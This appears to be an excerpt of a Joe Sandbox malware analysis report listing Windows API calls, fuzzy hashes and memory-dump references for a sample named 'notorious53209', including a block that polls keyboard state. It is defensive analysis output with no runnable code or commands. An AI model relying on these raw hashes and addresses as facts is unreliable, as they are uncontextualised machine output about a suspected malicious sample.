                                            • Opcode Fuzzy Hash: 43236289c13780588f349502433e296daadb1ee157cc51b938952656bd291e58
                                            • Instruction Fuzzy Hash: 6821AE70624705AFEB025F30FE8DA3A3B69EB453A6F401578FC05811B1CBB19C64DB21
                                            APIs
                                              • Part of subcall function 00239997: __itow.LIBCMT ref: 002399C2
                                              • Part of subcall function 00239997: __swprintf.LIBCMT ref: 00239A0C
                                            • CoInitialize.OLE32(00000000), ref: 0029D855
                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0029D8E8
                                            • SHGetDesktopFolder.SHELL32(?), ref: 0029D8FC
                                            • CoCreateInstance.OLE32(002C2D7C,00000000,00000001,002EA89C,?), ref: 0029D948
                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0029D9B7
                                            • CoTaskMemFree.OLE32(?), ref: 0029DA0F
                                            • _memset.LIBCMT ref: 0029DA4C
                                            • SHBrowseForFolderW.SHELL32(?), ref: 0029DA88
                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0029DAAB
                                            • CoTaskMemFree.OLE32(00000000), ref: 0029DAB2
                                            • CoTaskMemFree.OLE32(00000000), ref: 0029DAE9
                                            • CoUninitialize.OLE32 ref: 0029DAEB
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                            • String ID:
                                            • API String ID: 1246142700-0
                                            • Opcode ID: 62ce6243e69fce859a93485aa344dc6d067068ba3ce996c04b3b0e2f6e4fe2f7
                                            • Instruction ID: 22d8feb7b968125dd84acbc0e8879362662f323b9328650f9f2b8a2a4b554b40
                                            • Opcode Fuzzy Hash: 62ce6243e69fce859a93485aa344dc6d067068ba3ce996c04b3b0e2f6e4fe2f7
                                            • Instruction Fuzzy Hash: F8B1F975A10209AFDB04DF64C988EAEBBB9FF49304B148469E90AEB251DB30ED51CF50
                                            APIs
                                            • GetKeyboardState.USER32(?), ref: 002905A7
                                            • SetKeyboardState.USER32(?), ref: 00290612
                                            • GetAsyncKeyState.USER32(000000A0), ref: 00290632
                                            • GetKeyState.USER32(000000A0), ref: 00290649
                                            • GetAsyncKeyState.USER32(000000A1), ref: 00290678
                                            • GetKeyState.USER32(000000A1), ref: 00290689
                                            • GetAsyncKeyState.USER32(00000011), ref: 002906B5
                                            • GetKeyState.USER32(00000011), ref: 002906C3
                                            • GetAsyncKeyState.USER32(00000012), ref: 002906EC
                                            • GetKeyState.USER32(00000012), ref: 002906FA
                                            • GetAsyncKeyState.USER32(0000005B), ref: 00290723
                                            • GetKeyState.USER32(0000005B), ref: 00290731
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: State$Async$Keyboard
                                            • String ID:
                                            • API String ID: 541375521-0
                                            • Opcode ID: c90339809af3d6b424d4c2e062deea0ca9f7442dd20b2c592274b2873cdb16bd
                                            • Instruction ID: 85471ecbc89572ab634035f568b0becc020e183f5375a848cdd1ccb5347e8910
                                            • Opcode Fuzzy Hash: c90339809af3d6b424d4c2e062deea0ca9f7442dd20b2c592274b2873cdb16bd
                                            • Instruction Fuzzy Hash: F751D920A1478E2DFF35DFA088947EABFB49F01380F48459ED5C6561C2DA64AB6CCF61
                                            APIs
                                            • GetDlgItem.USER32(?,00000001), ref: 0028C746
                                            • GetWindowRect.USER32(00000000,?), ref: 0028C758
                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0028C7B6
                                            • GetDlgItem.USER32(?,00000002), ref: 0028C7C1
                                            • GetWindowRect.USER32(00000000,?), ref: 0028C7D3
                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0028C827
                                            • GetDlgItem.USER32(?,000003E9), ref: 0028C835
                                            • GetWindowRect.USER32(00000000,?), ref: 0028C846
                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0028C889
                                            • GetDlgItem.USER32(?,000003EA), ref: 0028C897
                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0028C8B4
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0028C8C1
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Window$ItemMoveRect$Invalidate
                                            • String ID:
                                            • API String ID: 3096461208-0
                                            • Opcode ID: eb40039f7e5e3350639422539946baf3305973b7169fb3f11b6ce9a050b4d434
                                            • Instruction ID: 75b21bb9440a506239a49c2f55622bb037c7b16b872e4840d47e329c5118094d
                                            • Opcode Fuzzy Hash: eb40039f7e5e3350639422539946baf3305973b7169fb3f11b6ce9a050b4d434
                                            • Instruction Fuzzy Hash: B4514175B10205AFDB18DF68DD99AAEBBBAEB88310F14822DF915D72D0D7709D408B10
                                            APIs
                                              • Part of subcall function 002325DB: GetWindowLongW.USER32(?,000000EB), ref: 002325EC
                                            • GetSysColor.USER32(0000000F), ref: 002321D3
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ColorLongWindow
                                            • String ID:
                                            • API String ID: 259745315-0
                                            • Opcode ID: c1c828bff7e3e784910aaf16b469423a93370baa01eec33989a1798cdd09bb74
                                            • Instruction ID: db2dacf74ec2750715d43695ca70bb4660dea94d2f641a6d3bc67351bf0e96dc
                                            • Opcode Fuzzy Hash: c1c828bff7e3e784910aaf16b469423a93370baa01eec33989a1798cdd09bb74
                                            • Instruction Fuzzy Hash: BC41A371020241EFDF255F28EC48BBA3B65EB06331F244365FDA98A1E2C7318C96DB61
                                            APIs
                                            • CharLowerBuffW.USER32(?,?), ref: 0029AB76
                                            • GetDriveTypeW.KERNEL32(00000061,002EA620,00000061), ref: 0029AC40
                                            • _wcscpy.LIBCMT ref: 0029AC6A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: BuffCharDriveLowerType_wcscpy
                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                            • API String ID: 2820617543-1000479233
                                            • Opcode ID: 40d4a124ae5b16b342ace621fc8f97500c7204c07edc615217856ef87d4d0dc8
                                            • Instruction ID: 6a6dfa04353927e0ba0ed1fe2f0923566a29ec1c9e2d22361eb420eb9ff33dbf
                                            • Opcode Fuzzy Hash: 40d4a124ae5b16b342ace621fc8f97500c7204c07edc615217856ef87d4d0dc8
                                            • Instruction Fuzzy Hash: 5751C0701383029BCB14EF14C991AAEB7A5EF95304F50482DF886572A2DB71E969CF93
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: __i64tow__itow__swprintf
                                            • String ID: %.15g$0x%p$False$True
                                            • API String ID: 421087845-2263619337
                                            • Opcode ID: 1a8726b41b267650f7da17e2439d9a59c1c058acc0ab17888b9b4a3a716d6651
                                            • Instruction ID: a8cf5507a244cab356524dafb658787a01cd334bdf8a5a782bbdd157fb6b5f14
                                            • Opcode Fuzzy Hash: 1a8726b41b267650f7da17e2439d9a59c1c058acc0ab17888b9b4a3a716d6651
                                            • Instruction Fuzzy Hash: 7B41C6B1634206AAEF24DF38DD42F7673E8EB45300F20446EE549D7291EAB199A5CF11
                                            APIs
                                            • _memset.LIBCMT ref: 002B73D9
                                            • CreateMenu.USER32 ref: 002B73F4
                                            • SetMenu.USER32(?,00000000), ref: 002B7403
                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B7490
                                            • IsMenu.USER32(?), ref: 002B74A6
                                            • CreatePopupMenu.USER32 ref: 002B74B0
                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002B74DD
                                            • DrawMenuBar.USER32 ref: 002B74E5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                            • String ID: 0$F
                                            • API String ID: 176399719-3044882817
                                            • Opcode ID: feebfcda4d875f57f2540b2706599ab8be80a0fb147b5143ffb6ac976e9ad1d7
                                            • Instruction ID: f6a6a526cb73a0b6f3932736ea8ca48d7680de371c11f37ba74a9805b2701f01
                                            • Opcode Fuzzy Hash: feebfcda4d875f57f2540b2706599ab8be80a0fb147b5143ffb6ac976e9ad1d7
                                            • Instruction Fuzzy Hash: 6C415875A1020AEFDB20DF64E988EEABBB5FF49391F144128F95997360D730A924CF50
                                            APIs
                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000), ref: 002B77CD
                                            • CreateCompatibleDC.GDI32(00000000), ref: 002B77D4
                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 002B77E7
                                            • SelectObject.GDI32(00000000,00000000), ref: 002B77EF
                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 002B77FA
                                            • DeleteDC.GDI32(00000000), ref: 002B7803
                                            • GetWindowLongW.USER32(?,000000EC), ref: 002B780D
                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 002B7821
                                            • DestroyWindow.USER32(?), ref: 002B782D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                            • String ID: static
                                            • API String ID: 2559357485-2160076837
                                            • Opcode ID: caac43b2673912a48d7553faf2e9230f25b69c10dddbf4f9c75276b902e01d5d
                                            • Instruction ID: 947ecb9385cade90073b8a788c1725f2a9ef2ed7bb4f756b0da2adb7976e93ab
                                            • Opcode Fuzzy Hash: caac43b2673912a48d7553faf2e9230f25b69c10dddbf4f9c75276b902e01d5d
                                            • Instruction Fuzzy Hash: B0316C31115115ABDF129F74EC0CFEA3B69EF49360F114325FA25A60A0DB71E821EBA4
                                            APIs
                                            • _memset.LIBCMT ref: 0025707B
                                              • Part of subcall function 00258D68: __getptd_noexit.LIBCMT ref: 00258D68
                                            • __gmtime64_s.LIBCMT ref: 00257114
                                            • __gmtime64_s.LIBCMT ref: 0025714A
                                            • __gmtime64_s.LIBCMT ref: 00257167
                                            • __allrem.LIBCMT ref: 002571BD
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 002571D9
                                            • __allrem.LIBCMT ref: 002571F0
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0025720E
                                            • __allrem.LIBCMT ref: 00257225
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00257243
                                            • __invoke_watson.LIBCMT ref: 002572B4
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                            • String ID:
                                            • API String ID: 384356119-0
                                            • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                            • Instruction ID: 32a24dae645e0ac8b86f1603ad2dc3921c57a11ee44954884963478ade346f6d
                                            • Opcode Fuzzy Hash: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                            • Instruction Fuzzy Hash: 70712771A64717ABE714EE79DC41B6AB3E8AF10321F10422AFC14E76C1EB70DD648B94
                                            APIs
                                            • _memset.LIBCMT ref: 00292A31
                                            • GetMenuItemInfoW.USER32(002F6890,000000FF,00000000,00000030), ref: 00292A92
                                            • SetMenuItemInfoW.USER32(002F6890,00000004,00000000,00000030), ref: 00292AC8
                                            • Sleep.KERNEL32(000001F4), ref: 00292ADA
                                            • GetMenuItemCount.USER32(?), ref: 00292B1E
                                            • GetMenuItemID.USER32(?,00000000), ref: 00292B3A
                                            • GetMenuItemID.USER32(?,-00000001), ref: 00292B64
                                            • GetMenuItemID.USER32(?,?), ref: 00292BA9
                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00292BEF
                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00292C03
                                            • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00292C24
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                            • String ID:
                                            • API String ID: 4176008265-0
                                            • Opcode ID: d0cd0cdf5ff3fc2ea39e1e2e21dfd8192557be748cfb84655c6e3a67608da868
                                            • Instruction ID: fc0e84ded15e27eeb679b0ab85f5394c4bed322b2ebf06acb81e390ce0615609
                                            • Opcode Fuzzy Hash: d0cd0cdf5ff3fc2ea39e1e2e21dfd8192557be748cfb84655c6e3a67608da868
                                            • Instruction Fuzzy Hash: AB61B1B192024AFFDF21CF64DD98EBE7BB8EB01348F140569E841A3251D731AD29DB20
                                            APIs
                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 002B7214
                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 002B7217
                                            • GetWindowLongW.USER32(?,000000F0), ref: 002B723B
                                            • _memset.LIBCMT ref: 002B724C
                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 002B725E
                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 002B72D6
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: MessageSend$LongWindow_memset
                                            • String ID:
                                            • API String ID: 830647256-0
                                            • Opcode ID: d80cbc505f2f8dbe3546fdd333757fbf9ef5680f5b8cdf4f148a0510608b1896
                                            • Instruction ID: 1292c22a7b6965e51f7d81df630443ce4bd0f6c751e7ef2126679751a94326b6
                                            • Opcode Fuzzy Hash: d80cbc505f2f8dbe3546fdd333757fbf9ef5680f5b8cdf4f148a0510608b1896
                                            • Instruction Fuzzy Hash: 50618C71910208AFDB10DFA8CC85EEEB7F8EB49750F1441A9FA14A72A1C770AE55DF60
                                            APIs
                                            • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00287135
                                            • SafeArrayAllocData.OLEAUT32(?), ref: 0028718E
                                            • VariantInit.OLEAUT32(?), ref: 002871A0
                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 002871C0
                                            • VariantCopy.OLEAUT32(?,?), ref: 00287213
                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 00287227
                                            • VariantClear.OLEAUT32(?), ref: 0028723C
                                            • SafeArrayDestroyData.OLEAUT32(?), ref: 00287249
                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00287252
                                            • VariantClear.OLEAUT32(?), ref: 00287264
                                            • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0028726F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_230000_notorious53209.jbxd
                                            Similarity
                                            • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                            • String ID:
                                            • API String ID: 2706829360-0
                                            • Opcode ID: 5e60183057a153d2a44b0610d04a603df362a86400c92e9ad708eca9fe317145
                                            • Instruction ID: 9070df1f2699ffaad3f76ffea4587b0a4edaac97c72f1a3795cc40ed6c1efa45
                                            • Opcode Fuzzy Hash: 5e60183057a153d2a44b0610d04a603df362a86400c92e9ad708eca9fe317145
                                            • Instruction Fuzzy Hash: 9B417F75A10219AFCF00EF68DD489AEBBB8FF08354F108169FA45A7261CB70E955CF90
                                            APIs
                                              • Part of subcall function 00239997: __itow.LIBCMT ref: 002399C2
                                              • Part of subcall function 00239997: __swprintf.LIBCMT ref: 00239A0C
                                            • CoInitialize.OLE32 ref: 002A8718
                                            • CoUninitialize.OLE32 ref: 002A8723
                                            • CoCreateInstance.OLE32(?,00000000,00000017,002C2BEC,?), ref: 002A8783
                                            • IIDFromString.OLE32(?,?), ref: 002A87F6
                                            • VariantInit.OLEAUT32(?), ref: 002A8890
                                            • VariantClear.OLEAUT32(?), ref: 002A88F1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002E5000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.00000000002EF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000313000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395556369.0000000000349000.00000040.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395587978.000000000034F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395591272.0000000000350000.00000008.00000001.01000000.00000004.sdmpDownload File
                                            • Associated: 0000000A.00000002.395599738.0000000000396000.00000004.00000001.01000000.00000004.sdmpDownload File
